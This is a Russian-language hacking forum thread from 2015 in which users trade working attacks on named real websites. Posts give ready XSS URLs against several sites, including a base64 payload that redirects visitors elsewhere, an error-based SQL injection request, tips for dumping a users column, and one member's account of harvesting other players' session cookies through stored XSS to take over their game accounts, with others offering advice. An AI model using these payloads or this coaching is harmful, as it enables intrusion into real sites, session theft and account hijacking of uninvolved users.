Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Вот так работает:
    Code:
    http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22
    Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок
     
    BigBear and yarbabin like this.
  2. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."
     
  3. Root2

    Root2 New Member

    Joined:
    16 Jul 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста.
    Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.

    Пробывал так
    unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
    convert(group_concat(users)+using+ascii) пустое поле выдает.
    CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'


    Как быть?
     
  4. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Раскрутить не получилось, но XSS получилось.
    Code:
    xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1hTU1BPU0VELyk=%3E
    http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNoYXQucnUnOw==%3E
    
    WAF только на формы, обход через Request_Uri
     
    #344 ocheretko, 16 Jul 2015
    Last edited: 16 Jul 2015
    SaNDER likes this.
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    если просто в hex? есть вывод?
     
    _________________________
  6. Root2

    Root2 New Member

    Joined:
    16 Jul 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Нет тоже информация не отоброжается
     
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    concat_ws(0x3a,convert(users%20using%20utf8))
    А так ?
     
    _________________________
  8. Root2

    Root2 New Member

    Joined:
    16 Jul 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
     
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Покажи ссылку
     
    _________________________
  10. Aiera

    Aiera New Member

    Joined:
    6 Sep 2012
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    Помогите, попал в тупик.
    Вот страница - http://www.ezar.ru/?a=reg
    Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows()
    Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается.
     
  11. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS:

    Code:
    1)  http://www.ezar.ru/testd.php?domain=ezar.ru&nick=<img/src="x"/onerror=alert(/XSSPOSED/);>
    
    2) url: http://www.ezar.ru/prereg.php
    POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C%2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK
    Чтобы не мучится с POST, работайте так:
    Code:
    http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='
     
    #351 ocheretko, 19 Jul 2015
    Last edited: 19 Jul 2015
    Aiera likes this.
  12. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    подскажите как юзнуть ету уязвимость
    Code:
    PHP Object Injection
    Userinput reaches sensitive sink. For more information, press the help icon on the left side.
    12: unserialize $data = unserialize($compressed); 
    9: $compressed = base64_decode($cookieData); 
    8: $cookieData = str_replace('#', '+', $cookieData); 
    6: $cookieData = $_COOKIE['___389_shR7_ZeE'];
     
  13. ErrNick

    ErrNick New Member

    Joined:
    17 Aug 2012
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    yarbabin likes this.
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    POST /calc/save_form/ HTTP/1.1
    Host: www.fortun.ru
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.fortun.ru/calc/
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 18
    
    element%5B28|extractvalue(1,concat(0x3a,(select version())))%5D=on
     
    _________________________
  15. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Привет всем,нашел атаку на сайте при создание ника можно в поле ника вписывать разные скрипты и все робит,допустим вписываю ява скрипт алерт и сообщение вылазит везде где отображается мой ник и еще когда захожу в админ панель и там скрипт тоже исполняется [​IMG] но собственно сам вопрос как можно взломать сайт при поможи этого?
     
  16. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    frank likes this.
  17. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Да там куки почему то на сайте не подмениваются
     
    #357 nik1201, 22 Jul 2015
    Last edited by a moderator: 22 Jul 2015
  18. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Поставьте вопрос более конкретно, с описанием всех Ваших действий
     
  19. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Привет всем,вот мне приходят куки с форума игры.
    ------------------------------------------------------------------------------------------------------
    w2vL_cca8_lastvisit=1437004847;
    w2vL_cca8_nofavfid=1;
    PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
    w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc7NidwNkrv05%2F53l2Qado4EaUbTuI;
    w2vL_cca8_lastcheckfeed=21728%7C1437560824;
    w2vL_cca8_visitedfid=45D46D53D2;
    w2vL_cca8_viewid=tid_6189;
    w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_1437524926D_46_1437525191D_45_1437561663;
    w2vL_cca8_smile=1D1;
    __zlcmid=Vienkp6pQjrijA;
    _ga=GA1.2.956537111.1436906922F;
    w2vL_cca8_lastact=1437566946%09forum.php%09;
    w2vL_cca8_onlineusernum=59;
    w2vL_cca8_sid=ro6N6g

    ------------------------------------------------------------------------------------------------------
    Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
    ------------------------------------------------------------------------------------------------------
    1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
    2)_ga=GA1.2.956537111.1436906922F

    ------------------------------------------------------------------------------------------------------
    Но когда заменяю на форуме ,куки не подмениваются.
    ------------------------------------------------------------------------------------------------------
    Сайт выглядит такого типа www.site.ru/forum/forum.php
    На www.site.ru расположен профиль игрока,тут короче выбираешь сервер и играешь.
    На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.
    В чем может быть проблема?
     
  20. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    Обычно с тем что там разные профили при регистрации, разные движки и базы данных.